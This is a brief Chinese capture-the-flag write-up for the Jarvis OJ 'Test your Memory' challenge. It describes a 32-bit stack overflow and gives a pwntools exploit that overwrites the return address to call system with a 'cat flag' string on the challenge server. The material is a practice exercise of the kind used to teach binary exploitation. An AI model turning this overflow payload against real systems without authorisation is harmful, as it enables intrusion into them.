Jarvis OJ---Test your Memory

2017-09-24  本文已影响0人  yahoo0o0

32位下的简单栈溢出,IDA反编译之后发现在memtest函数之中传入参数cat flag,在函数winfunc之中调用了系统函数system。

image.png image.png

ret2libc,直接getshell

from pwn import *

p = remote("pwn2.jarvisoj.com",9876)
callsystem = 0x080485BD
catflag = 0x080487E0
payload = 'a'*(0x13 + 4) + p32(callsystem) + p32(0x08048677) + p32(catflag)
p.sendline(payload)
p.interactive()
上一篇 下一篇

猜你喜欢

热点阅读